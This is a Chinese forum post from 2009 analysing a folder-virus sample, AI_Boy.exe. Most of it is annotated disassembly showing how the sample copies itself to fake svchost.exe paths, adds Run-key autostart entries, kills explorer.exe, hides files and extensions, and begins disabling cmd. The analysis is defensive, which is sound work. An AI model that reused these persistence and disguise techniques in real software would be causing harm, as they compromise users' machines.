文件夹病毒简单分析
本帖最后由 豪斯登堡新郎 于 2009-6-22 08:33 编辑文件: Programs AI_Boy.exe
大小: 254021 字节
MD5: AD4A82D68F7831B1FC960D3F1021D11E
SHA1: 3428ADD6219D30891E5441EC27200FE4430258DD
CRC32: 98B01919
开发语言:Microsoft Visual C++ 6.0
卡巴斯基:N/A
瑞星:N/A
金山毒霸:Heur.Win32.Generic_01.h
只做非常简单的行为分析 疏漏之处还请见谅
1.创建互斥体
004010A0 > \55 push ebp
004010A1 .8BEC mov ebp, esp
004010A3 .81EC 08050000 sub esp, 508
004010A9 .53 push ebx
004010AA .56 push esi
004010AB .57 push edi
004010AC .8DBD F8FAFFFF lea edi, dword ptr
004010B2 .B9 42010000 mov ecx, 142
004010B7 .B8 CCCCCCCC mov eax, CCCCCCCC
004010BC .F3:AB rep stos dword ptr es:
004010BE .8BF4 mov esi, esp
004010C0 .68 78E14200 push 0042E178 ; /MutexName = "TEST_VIRUS_ONE"
004010C5 .6A 00 push 0 ; |InitialOwner = FALSE
004010C7 .6A 00 push 0 ; |pSecurity = NULL
004010C9 .FF15 B0834300 call dword ptr [<&KERNEL32.CreateMute>; \创建一个名为"TEST_VIRUS_ONE"的互斥体
2.获取系统信息
004040B0 >/$55 push ebp
004040B1|.8BEC mov ebp, esp
004040B3|.6A FF push -1
004040B5|.68 A8E84200 push 0042E8A8
004040BA|.68 D0634000 push 004063D0 ;
004040BF|.64:A1 0000000>mov eax, dword ptr fs:
004040C5|.50 push eax
004040C6|.64:8925 00000>mov dword ptr fs:, esp
004040CD|.83C4 A4 add esp, -5C
004040D0|.53 push ebx
004040D1|.56 push esi
004040D2|.57 push edi
004040D3|.8965 E8 mov dword ptr , esp
004040D6|.FF15 5C844300 call dword ptr [<&KERNEL32.GetVersion>;获取系统信息
3.提权
00401B47|.51 push ecx ; /pLocalId
00401B48|.68 A8E14200 push 0042E1A8 ; |Privilege = "SeDebugPrivilege"
00401B4D|.6A 00 push 0 ; |SystemName = NULL
00401B4F|.FF15 74834300 call dword ptr [<&ADVAPI32.LookupPriv>; 为进程提升SeDebugPrivilege权限
4.创建病毒文件并运行进程
004010CF .3BF4 cmp esi, esp
004010D1 .E8 EA2A0000 call 00403BC0
004010D6 .8BF4 mov esi, esp
004010D8 .FF15 E0834300 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
004010DE .3BF4 cmp esi, esp
004010E0 .E8 DB2A0000 call 00403BC0
004010E5 .3D B7000000 cmp eax, 0B7
004010EA .0F85 9F000000 jnz 0040118F
004010F0 .8BF4 mov esi, esp
004010F2 .68 04010000 push 104 ; /BufSize = 104 (260.)
004010F7 .68 EC5D4300 push 00435DEC ; |PathBuffer = Programs.00435DEC
004010FC .6A 00 push 0 ; |hModule = NULL
004010FE .FF15 10844300 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401104 .3BF4 cmp esi, esp
00401106 .E8 B52A0000 call 00403BC0
0040110B .68 EC5D4300 push 00435DEC
00401110 .E8 2B2A0000 call 00403B40
00401115 .83C4 04 add esp, 4
00401118 .83E8 68 sub eax, 68
0040111B .50 push eax
0040111C .68 EC5D4300 push 00435DEC
00401121 .68 E85C4300 push 00435CE8
00401126 .E8 15290000 call 00403A40
0040112B .83C4 0C add esp, 0C
0040112E .68 EC5D4300 push 00435DEC
00401133 .E8 082A0000 call 00403B40
00401138 .83C4 04 add esp, 4
0040113B .C680 805C4300>mov byte ptr , 0
00401142 .8BF4 mov esi, esp
00401144 .68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator\",D7,"烂鎈Programs"
00401149 .68 F0E04200 push 0042E0F0 ; |Format = "%s.exe AI_Boy....\"
0040114E .8D85 FCFEFFFF lea eax, dword ptr ; |
00401154 .50 push eax ; |s
00401155 .FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
0040115B .83C4 0C add esp, 0C
0040115E .3BF4 cmp esi, esp
00401160 .E8 5B2A0000 call 00403BC0
00401165 .8BF4 mov esi, esp
00401167 .6A 01 push 1 ; /IsShown = 1
00401169 .6A 00 push 0 ; |DefDir = NULL
0040116B .6A 00 push 0 ; |Parameters = NULL
0040116D .8D8D FCFEFFFF lea ecx, dword ptr ; |
00401173 .51 push ecx ; |FileName
00401174 .68 E8E04200 push 0042E0E8 ; |Operation = "open"
00401179 .6A 00 push 0 ; |hWnd = NULL
0040117B .FF15 E4854300 call dword ptr [<&SHELL32.ShellExecut>; \运行
00401181 .3BF4 cmp esi, esp
00401183 .E8 382A0000 call 00403BC0
00401188 .33C0 xor eax, eax
0040118A .E9 34040000 jmp 004015C3
0040118F >8BF4 mov esi, esp
00401191 .6A 00 push 0 ; /hTemplateFile = NULL
00401193 .6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00401195 .6A 03 push 3 ; |Mode = OPEN_EXISTING
00401197 .6A 00 push 0 ; |pSecurity = NULL
00401199 .6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
0040119B .68 00000080 push 80000000 ; |Access = GENERIC_READ
004011A0 .68 301A4300 push 00431A30 ; |FileName = "C:\WINDOWS\svchost.exe"
004011A5 .FF15 14844300 call dword ptr [<&KERNEL32.CreateFile>; \创建文件C:\WINDOWS\svchost.exe
004011AB .3BF4 cmp esi, esp
004011AD .E8 0E2A0000 call 00403BC0
004011B2 .83F8 FF cmp eax, -1
004011B5 .0F85 04020000 jnz 004013BF
004011BB .8BF4 mov esi, esp
004011BD .68 04010000 push 104 ; /BufSize = 104 (260.)
004011C2 .68 EC5D4300 push 00435DEC ; |PathBuffer = Programs.00435DEC
004011C7 .6A 00 push 0 ; |hModule = NULL
004011C9 .FF15 10844300 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004011CF .3BF4 cmp esi, esp
004011D1 .E8 EA290000 call 00403BC0
004011D6 .68 EC5D4300 push 00435DEC
004011DB .E8 60290000 call 00403B40
004011E0 .83C4 04 add esp, 4
004011E3 .83E8 68 sub eax, 68
004011E6 .50 push eax
004011E7 .68 EC5D4300 push 00435DEC
004011EC .68 E85C4300 push 00435CE8
004011F1 .E8 4A280000 call 00403A40
004011F6 .83C4 0C add esp, 0C
004011F9 .68 EC5D4300 push 00435DEC
004011FE .E8 3D290000 call 00403B40
00401203 .83C4 04 add esp, 4
00401206 .C680 805C4300>mov byte ptr , 0
0040120D .8BF4 mov esi, esp
0040120F .68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator\",D7,"烂鎈Programs"
00401214 .68 F0E04200 push 0042E0F0 ; |Format = "%s.exe AI_Boy....\"
00401219 .8D95 F4FCFFFF lea edx, dword ptr ; |
0040121F .52 push edx ; |s
00401220 .FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00401226 .83C4 0C add esp, 0C
00401229 .3BF4 cmp esi, esp
0040122B .E8 90290000 call 00403BC0
00401230 .8BF4 mov esi, esp
00401232 .6A 01 push 1 ; /IsShown = 1
00401234 .6A 00 push 0 ; |DefDir = NULL
00401236 .6A 00 push 0 ; |Parameters = NULL
00401238 .8D85 F4FCFFFF lea eax, dword ptr ; |
0040123E .50 push eax ; |FileName
0040123F .68 E8E04200 push 0042E0E8 ; |Operation = "open"
00401244 .6A 00 push 0 ; |hWnd = NULL
00401246 .FF15 E4854300 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA
0040124C .3BF4 cmp esi, esp
0040124E .E8 6D290000 call 00403BC0
00401253 .8BF4 mov esi, esp
00401255 .6A 00 push 0 ; /hTemplateFile = NULL
00401257 .6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00401259 .6A 03 push 3 ; |Mode = OPEN_EXISTING
0040125B .6A 00 push 0 ; |pSecurity = NULL
0040125D .6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
0040125F .68 00000080 push 80000000 ; |Access = GENERIC_READ
00401264 .68 CCE04200 push 0042E0CC ; |FileName = "C:\Windows\zhoutun.txt"
00401269 .FF15 14844300 call dword ptr [<&KERNEL32.CreateFile>; \创建文件C:\Windows\zhoutun.txt
0040126F .3BF4 cmp esi, esp
00401271 .E8 4A290000 call 00403BC0
00401276 .83F8 FF cmp eax, -1
00401279 .74 07 je short 00401282
0040127B .33C0 xor eax, eax
0040127D .E9 41030000 jmp 004015C3
00401282 >8BF4 mov esi, esp
00401284 .68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator\",D7,"烂鎈Programs"
00401289 .68 38E04200 push 0042E038 ; |Format = "%s.exe AI_Boy....\\Recycle.exe"
0040128E .8D8D F8FDFFFF lea ecx, dword ptr ; |
00401294 .51 push ecx ; |s
00401295 .FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
0040129B .83C4 0C add esp, 0C
0040129E .3BF4 cmp esi, esp
004012A0 .E8 1B290000 call 00403BC0
004012A5 .8BF4 mov esi, esp
004012A7 .6A 00 push 0 ; /FailIfExists = FALSE
004012A9 .68 301A4300 push 00431A30 ; |NewFileName = "C:\WINDOWS\svchost.exe"
004012AE .68 EC5D4300 push 00435DEC ; |ExistingFileName = "C:\Documents and Settings\Administrator\",D7,"烂鎈Programs AI_Boy.exe"
004012B3 .FF15 18844300 call dword ptr [<&KERNEL32.CopyFileA>>; \将自身复制到C:\WINDOWS\svchost.exe
004012B9 .3BF4 cmp esi, esp
004012BB .E8 00290000 call 00403BC0
004012C0 .8BF4 mov esi, esp
004012C2 .6A 00 push 0 ; /FailIfExists = FALSE
004012C4 .68 341B4300 push 00431B34 ; |NewFileName = "C:\WINDOWS\system\svchost.exe"
004012C9 .8D95 F8FDFFFF lea edx, dword ptr ; |
004012CF .52 push edx ; |ExistingFileName
004012D0 .FF15 18844300 call dword ptr [<&KERNEL32.CopyFileA>>; 将自身复制到C:\WINDOWS\system\svchost.exe
004012D6 .3BF4 cmp esi, esp
004012D8 .E8 E3280000 call 00403BC0
004012DD .C785 B0FCFFFF>mov dword ptr , 44
004012E7 .B9 10000000 mov ecx, 10
004012EC .33C0 xor eax, eax
004012EE .8DBD B4FCFFFF lea edi, dword ptr
004012F4 .F3:AB rep stos dword ptr es:
004012F6 .C785 DCFCFFFF>mov dword ptr , 40
00401300 .8BF4 mov esi, esp
00401302 .8D85 A0FCFFFF lea eax, dword ptr
00401308 .50 push eax ; /pProcessInfo
00401309 .8D8D B0FCFFFF lea ecx, dword ptr ; |
0040130F .51 push ecx ; |pStartupInfo
00401310 .6A 00 push 0 ; |CurrentDir = NULL
00401312 .6A 00 push 0 ; |pEnvironment = NULL
00401314 .6A 00 push 0 ; |CreationFlags = 0
00401316 .6A 00 push 0 ; |InheritHandles = FALSE
00401318 .6A 00 push 0 ; |pThreadSecurity = NULL
0040131A .6A 00 push 0 ; |pProcessSecurity = NULL
0040131C .68 341B4300 push 00431B34 ; |CommandLine = "C:\WINDOWS\system\svchost.exe"
00401321 .6A 00 push 0 ; |ModuleFileName = NULL
00401323 .FF15 1C844300 call dword ptr [<&KERNEL32.CreateProc>; \创建进程
00401329 .3BF4 cmp esi, esp
0040132B .E8 90280000 call 00403BC0
00401330 .8BF4 mov esi, esp
00401332 .8B95 A4FCFFFF mov edx, dword ptr
00401338 .52 push edx ; /hObject
00401339 .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0040133F .3BF4 cmp esi, esp
00401341 .E8 7A280000 call 00403BC0
00401346 .8BF4 mov esi, esp
00401348 .8B85 A0FCFFFF mov eax, dword ptr
0040134E .50 push eax ; /hObject
0040134F .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401355 .3BF4 cmp esi, esp
00401357 .E8 64280000 call 00403BC0
0040135C .8BF4 mov esi, esp
0040135E .8D8D A0FCFFFF lea ecx, dword ptr
00401364 .51 push ecx ; /pProcessInfo
00401365 .8D95 B0FCFFFF lea edx, dword ptr ; |
0040136B .52 push edx ; |pStartupInfo
0040136C .6A 00 push 0 ; |CurrentDir = NULL
0040136E .6A 00 push 0 ; |pEnvironment = NULL
00401370 .6A 00 push 0 ; |CreationFlags = 0
00401372 .6A 00 push 0 ; |InheritHandles = FALSE
00401374 .6A 00 push 0 ; |pThreadSecurity = NULL
00401376 .6A 00 push 0 ; |pProcessSecurity = NULL
00401378 .68 301A4300 push 00431A30 ; |CommandLine = "C:\WINDOWS\svchost.exe"
0040137D .6A 00 push 0 ; |ModuleFileName = NULL
0040137F .FF15 1C844300 call dword ptr [<&KERNEL32.CreateProc>; 创建进程,运行C:\WINDOWS\svchost.exe
00401385 .3BF4 cmp esi, esp ;
00401387 .E8 34280000 call 00403BC0
0040138C .8BF4 mov esi, esp
0040138E .8B85 A4FCFFFF mov eax, dword ptr
00401394 .50 push eax ; /hObject
00401395 .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0040139B .3BF4 cmp esi, esp
0040139D .E8 1E280000 call 00403BC0
004013A2 .8BF4 mov esi, esp
004013A4 .8B8D A0FCFFFF mov ecx, dword ptr
004013AA .51 push ecx ; /hObject
004013AB .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004013B1 .3BF4 cmp esi, esp
004013B3 .E8 08280000 call 00403BC0
004013B8 .33C0 xor eax, eax
004013BA .E9 04020000 jmp 004015C3
004013BF >8BF4 mov esi, esp
004013C1 .68 04010000 push 104 ; /BufSize = 104 (260.)
004013C6 .68 EC5D4300 push 00435DEC ; |PathBuffer = Programs.00435DEC
004013CB .6A 00 push 0 ; |hModule = NULL
004013CD .FF15 10844300 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004013D3 .3BF4 cmp esi, esp
004013D5 .E8 E6270000 call 00403BC0
004013DA .68 301A4300 push 00431A30 ;ASCII "C:\WINDOWS\svchost.exe"
004013DF .68 EC5D4300 push 00435DEC
004013E4 .E8 17460100 call 00415A00
004013E9 .83C4 08 add esp, 8
004013EC .85C0 test eax, eax
004013EE .0F84 84000000 je 00401478
004013F4 .68 EC5D4300 push 00435DEC
004013F9 .E8 42270000 call 00403B40
004013FE .83C4 04 add esp, 4
00401401 .83E8 68 sub eax, 68
00401404 .50 push eax
00401405 .68 EC5D4300 push 00435DEC
0040140A .68 E85C4300 push 00435CE8
0040140F .E8 2C260000 call 00403A40
00401414 .83C4 0C add esp, 0C
00401417 .68 EC5D4300 push 00435DEC
0040141C .E8 1F270000 call 00403B40
00401421 .83C4 04 add esp, 4
00401424 .C680 805C4300>mov byte ptr , 0
0040142B .8BF4 mov esi, esp
0040142D .68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator\",D7,"烂鎈Programs"
00401432 .68 F0E04200 push 0042E0F0 ; |Format = "%s.exe AI_Boy....\"
00401437 .8D95 9CFBFFFF lea edx, dword ptr ; |
0040143D .52 push edx ; |s
0040143E .FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00401444 .83C4 0C add esp, 0C
00401447 .3BF4 cmp esi, esp
00401449 .E8 72270000 call 00403BC0
0040144E .8BF4 mov esi, esp
00401450 .6A 01 push 1 ; /IsShown = 1
00401452 .6A 00 push 0 ; |DefDir = NULL
00401454 .6A 00 push 0 ; |Parameters = NULL
00401456 .8D85 9CFBFFFF lea eax, dword ptr ; |
0040145C .50 push eax ; |FileName
0040145D .68 E8E04200 push 0042E0E8 ; |Operation = "open"
00401462 .6A 00 push 0 ; |hWnd = NULL
00401464 .FF15 E4854300 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA
0040146A .3BF4 cmp esi, esp
0040146C .E8 4F270000 call 00403BC0
00401471 .33C0 xor eax, eax
00401473 .E9 4B010000 jmp 004015C3
00401478 >E8 BAFBFFFF call 00401037
0040147D .8BF4 mov esi, esp
0040147F .8D8D 98FBFFFF lea ecx, dword ptr
00401485 .51 push ecx ; /pThreadId
00401486 .6A 00 push 0 ; |CreationFlags = 0
00401488 .6A 00 push 0 ; |pThreadParm = NULL
0040148A .68 2D104000 push 0040102D ; |ThreadFunction = Programs.0040102D
0040148F .6A 00 push 0 ; |StackSize = 0
00401491 .6A 00 push 0 ; |pSecurity = NULL
00401493 .FF15 24844300 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00401499 .3BF4 cmp esi, esp
0040149B .E8 20270000 call 00403BC0
004014A0 .8985 94FBFFFF mov dword ptr , eax
004014A6 .8BF4 mov esi, esp
004014A8 .8B95 94FBFFFF mov edx, dword ptr
004014AE .52 push edx ; /hObject
004014AF .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004014B5 .3BF4 cmp esi, esp
004014B7 .E8 04270000 call 00403BC0
004014BC .C785 90FBFFFF>mov dword ptr , 0
004014C6 >B8 01000000 mov eax, 1
004014CB .85C0 test eax, eax
004014CD .0F84 EE000000 je 004015C1
004014D3 .E8 37FBFFFF call 0040100F
004014D8 .E8 55FBFFFF call 00401032
004014DD .E8 37FBFFFF call 00401019
004014E2 .83BD 90FBFFFF>cmp dword ptr , 0
004014E9 .0F85 B9000000 jnz 004015A8
004014EF .68 1CE04200 push 0042E01C ;ASCII "c:\WINDOWS\explorer.exe"
004014F4 .E8 2FFBFFFF call 00401028
004014F9 .83C4 04 add esp, 4
004014FC .8985 8CFBFFFF mov dword ptr , eax
00401502 .8BF4 mov esi, esp
00401504 .6A FF push -1 ; /ExitCode = FFFFFFFF (-1.)
00401506 .8B8D 8CFBFFFF mov ecx, dword ptr ; |
0040150C .51 push ecx ; |hProcess
0040150D .FF15 28844300 call dword ptr [<&KERNEL32.TerminateP>; \遍历explorer.exe
00401513 .3BF4 cmp esi, esp
00401515 .E8 A6260000 call 00403BC0
0040151A .C785 48FBFFFF>mov dword ptr , 44
00401524 .B9 10000000 mov ecx, 10
00401529 .33C0 xor eax, eax
0040152B .8DBD 4CFBFFFF lea edi, dword ptr
00401531 .F3:AB rep stos dword ptr es:
00401533 .C785 74FBFFFF>mov dword ptr , 40
0040153D .8BF4 mov esi, esp
0040153F .8D95 38FBFFFF lea edx, dword ptr
00401545 .52 push edx ; /pProcessInfo
00401546 .8D85 48FBFFFF lea eax, dword ptr ; |
0040154C .50 push eax ; |pStartupInfo
0040154D .6A 00 push 0 ; |CurrentDir = NULL
0040154F .6A 00 push 0 ; |pEnvironment = NULL
00401551 .6A 00 push 0 ; |CreationFlags = 0
00401553 .6A 00 push 0 ; |InheritHandles = FALSE
00401555 .6A 00 push 0 ; |pThreadSecurity = NULL
00401557 .6A 00 push 0 ; |pProcessSecurity = NULL
00401559 .68 1CE04200 push 0042E01C ; |CommandLine = "c:\WINDOWS\explorer.exe"
0040155E .6A 00 push 0 ; |ModuleFileName = NULL
00401560 .FF15 1C844300 call dword ptr [<&KERNEL32.CreateProc>; \遍历explorer.exe
00401566 .3BF4 cmp esi, esp
00401568 .E8 53260000 call 00403BC0
0040156D .8BF4 mov esi, esp
0040156F .8B8D 38FBFFFF mov ecx, dword ptr
00401575 .51 push ecx ; /hObject
00401576 .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0040157C .3BF4 cmp esi, esp
0040157E .E8 3D260000 call 00403BC0
00401583 .8BF4 mov esi, esp
00401585 .8B95 3CFBFFFF mov edx, dword ptr
0040158B .52 push edx ; /hObject
0040158C .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401592 .3BF4 cmp esi, esp
00401594 .E8 27260000 call 00403BC0
00401599 .8B85 90FBFFFF mov eax, dword ptr
0040159F .83C0 01 add eax, 1
004015A2 .8985 90FBFFFF mov dword ptr , eax
004015A8 >8BF4 mov esi, esp
004015AA .68 E8030000 push 3E8 ; /Timeout = 1000. ms
004015AF .FF15 30844300 call dword ptr [<&KERNEL32.Sleep>] ; \等待10秒
5.修改注册表添加启动项目破坏显示隐藏文件及显示已知文件后缀、禁用cmd
00401BD0/> \55 push ebp
00401BD1|.8BEC mov ebp, esp
00401BD3|.81EC 7C020000 sub esp, 27C
00401BD9|.53 push ebx
00401BDA|.56 push esi
00401BDB|.57 push edi
00401BDC|.8DBD 84FDFFFF lea edi, dword ptr
00401BE2|.B9 9F000000 mov ecx, 9F
00401BE7|.B8 CCCCCCCC mov eax, CCCCCCCC
00401BEC|.F3:AB rep stos dword ptr es:
00401BEE|.A1 8CE34200 mov eax, dword ptr
00401BF3|.8945 F0 mov dword ptr , eax
00401BF6|.8B0D 90E34200 mov ecx, dword ptr
00401BFC|.894D F4 mov dword ptr , ecx
00401BFF|.66:8B15 94E34>mov dx, word ptr
00401C06|.66:8955 F8 mov word ptr , dx
00401C0A|.A0 96E34200 mov al, byte ptr
00401C0F|.8845 FA mov byte ptr , al
00401C12|.C745 EC 28E34>mov dword ptr , 0042E328 ;ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
00401C19|.8BF4 mov esi, esp
00401C1B|.8D4D FC lea ecx, dword ptr
00401C1E|.51 push ecx ; /pHandle
00401C1F|.68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00401C24|.6A 00 push 0 ; |Reserved = 0
00401C26|.8B55 EC mov edx, dword ptr ; |
00401C29|.52 push edx ; |Subkey
00401C2A|.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401C2F|.FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401C35|.3BF4 cmp esi, esp
00401C37|.E8 841F0000 call 00403BC0
00401C3C|.8BF4 mov esi, esp
00401C3E|.6A 0B push 0B ; /BufSize = B (11.)
00401C40|.8D45 F0 lea eax, dword ptr ; |
00401C43|.50 push eax ; |Buffer
00401C44|.6A 01 push 1 ; |ValueType = REG_SZ
00401C46|.6A 00 push 0 ; |Reserved = 0
00401C48|.68 18E34200 push 0042E318 ; |ValueName = "CheckedValue"
00401C4D|.8B4D FC mov ecx, dword ptr ; |
00401C50|.51 push ecx ; |hKey
00401C51|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \修改注册表\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue: 0x00000001
00401C57|.3BF4 cmp esi, esp
00401C59|.E8 621F0000 call 00403BC0
00401C5E|.8BF4 mov esi, esp
00401C60|.8B55 FC mov edx, dword ptr
00401C63|.52 push edx ; /hKey
00401C64|.FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401C6A|.3BF4 cmp esi, esp
00401C6C|.E8 4F1F0000 call 00403BC0
00401C71|.C745 E4 01000>mov dword ptr , 1
00401C78|.C745 E0 B8E24>mov dword ptr , 0042E2B8 ;ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt"
00401C7F|.8BF4 mov esi, esp
00401C81|.8D45 E8 lea eax, dword ptr
00401C84|.50 push eax ; /pHandle
00401C85|.68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00401C8A|.6A 00 push 0 ; |Reserved = 0
00401C8C|.8B4D E0 mov ecx, dword ptr ; |
00401C8F|.51 push ecx ; |Subkey
00401C90|.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401C95|.FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401C9B|.3BF4 cmp esi, esp
00401C9D|.E8 1E1F0000 call 00403BC0
00401CA2|.8BF4 mov esi, esp
00401CA4|.6A 04 push 4 ; /BufSize = 4
00401CA6|.8D55 E4 lea edx, dword ptr ; |
00401CA9|.52 push edx ; |Buffer
00401CAA|.6A 04 push 4 ; |ValueType = REG_DWORD
00401CAC|.6A 00 push 0 ; |Reserved = 0
00401CAE|.68 A4E24200 push 0042E2A4 ; |ValueName = "UnCheckedValue"
00401CB3|.8B45 E8 mov eax, dword ptr ; |
00401CB6|.50 push eax ; |hKey
00401CB7|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \修改注册表SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt破坏显示文件后缀功能
00401CBD|.3BF4 cmp esi, esp
00401CBF|.E8 FC1E0000 call 00403BC0
00401CC4|.8BF4 mov esi, esp
00401CC6|.8B4D E8 mov ecx, dword ptr
00401CC9|.51 push ecx ; /hKey
00401CCA|.FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401CD0|.3BF4 cmp esi, esp
00401CD2|.E8 E91E0000 call 00403BC0
00401CD7|.B9 05000000 mov ecx, 5
00401CDC|.BE 88E24200 mov esi, 0042E288 ;ASCII "C:\windows\svchost.exe"
00401CE1|.8DBD D8FEFFFF lea edi, dword ptr
00401CE7|.F3:A5 rep movs dword ptr es:, dword p>
00401CE9|.66:A5 movs word ptr es:, word ptr [esi>
00401CEB|.A4 movs byte ptr es:, byte ptr [esi>
00401CEC|.B9 3B000000 mov ecx, 3B
00401CF1|.33C0 xor eax, eax
00401CF3|.8DBD EFFEFFFF lea edi, dword ptr
00401CF9|.F3:AB rep stos dword ptr es:
00401CFB|.AA stos byte ptr es:
00401CFC|.B9 07000000 mov ecx, 7
00401D01|.BE 64E24200 mov esi, 0042E264 ;ASCII "C:\windows\system\svchost.exe"
00401D06|.8DBD D4FDFFFF lea edi, dword ptr
00401D0C|.F3:A5 rep movs dword ptr es:, dword p>
00401D0E|.66:A5 movs word ptr es:, word ptr [esi>
00401D10|.B9 39000000 mov ecx, 39
00401D15|.33C0 xor eax, eax
00401D17|.8DBD F2FDFFFF lea edi, dword ptr
00401D1D|.F3:AB rep stos dword ptr es:
00401D1F|.66:AB stos word ptr es:
00401D21|.C785 D0FDFFFF>mov dword ptr , 0042E22C ;ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
00401D2B|.8BF4 mov esi, esp
00401D2D|.8D55 DC lea edx, dword ptr
00401D30|.52 push edx ; /pHandle
00401D31|.68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00401D36|.6A 00 push 0 ; |Reserved = 0
00401D38|.8B85 D0FDFFFF mov eax, dword ptr ; |
00401D3E|.50 push eax ; |Subkey
00401D3F|.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401D44|.FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401D4A|.3BF4 cmp esi, esp
00401D4C|.E8 6F1E0000 call 00403BC0
00401D51|.8D8D D8FEFFFF lea ecx, dword ptr
00401D57|.51 push ecx
00401D58|.E8 E31D0000 call 00403B40
00401D5D|.83C4 04 add esp, 4
00401D60|.8BF4 mov esi, esp
00401D62|.50 push eax ; /BufSize
00401D63|.8D95 D8FEFFFF lea edx, dword ptr ; |
00401D69|.52 push edx ; |Buffer
00401D6A|.6A 01 push 1 ; |ValueType = REG_SZ
00401D6C|.6A 00 push 0 ; |Reserved = 0
00401D6E|.68 1CE24200 push 0042E21C ; |ValueName = "svchost1.exe"
00401D73|.8B45 DC mov eax, dword ptr ; |
00401D76|.50 push eax ; |hKey
00401D77|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \添加注册表启动项"svchost1.exe"指向"C:\windows\svchost.exe"
00401D7D|.3BF4 cmp esi, esp
00401D7F|.E8 3C1E0000 call 00403BC0
00401D84|.8D8D D4FDFFFF lea ecx, dword ptr
00401D8A|.51 push ecx
00401D8B|.E8 B01D0000 call 00403B40
00401D90|.83C4 04 add esp, 4
00401D93|.8BF4 mov esi, esp
00401D95|.50 push eax ; /BufSize
00401D96|.8D95 D4FDFFFF lea edx, dword ptr ; |
00401D9C|.52 push edx ; |Buffer
00401D9D|.6A 01 push 1 ; |ValueType = REG_SZ
00401D9F|.6A 00 push 0 ; |Reserved = 0
00401DA1|.68 0CE24200 push 0042E20C ; |ValueName = "svchost2.exe"
00401DA6|.8B45 DC mov eax, dword ptr ; |
00401DA9|.50 push eax ; |hKey
00401DAA|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \添加注册表启动项"svchost2.exe"指向"C:\windows\system\svchost.exe"
00401DB0|.3BF4 cmp esi, esp
00401DB2|.E8 091E0000 call 00403BC0
00401DB7|.8BF4 mov esi, esp
00401DB9|.8B4D DC mov ecx, dword ptr
00401DBC|.51 push ecx ; /hKey
00401DBD|.FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401DC3|.3BF4 cmp esi, esp
00401DC5|.E8 F61D0000 call 00403BC0
00401DCA|.C785 C8FDFFFF>mov dword ptr , 2
00401DD4|.C785 C4FDFFFF>mov dword ptr , 0042E1D8 ;ASCII "Software\Policies\Microsoft\Windows\System"
00401DDE|.8BF4 mov esi, esp
00401DE0|.6A 00 push 0 ; /pDisposition = NULL
00401DE2|.8D95 CCFDFFFF lea edx, dword ptr ; |
00401DE8|.52 push edx ; |pHandle
00401DE9|.6A 00 push 0 ; |pSecurity = NULL
00401DEB|.68 3F000F00 push 0F003F ; |Access = KEY_ALL_ACCESS
00401DF0|.6A 00 push 0 ; |Options = REG_OPTION_NON_VOLATILE
00401DF2|.68 CCE14200 push 0042E1CC ; |Class = "REG_DWORD"
00401DF7|.6A 00 push 0 ; |Reserved = 0
00401DF9|.8B85 C4FDFFFF mov eax, dword ptr ; |
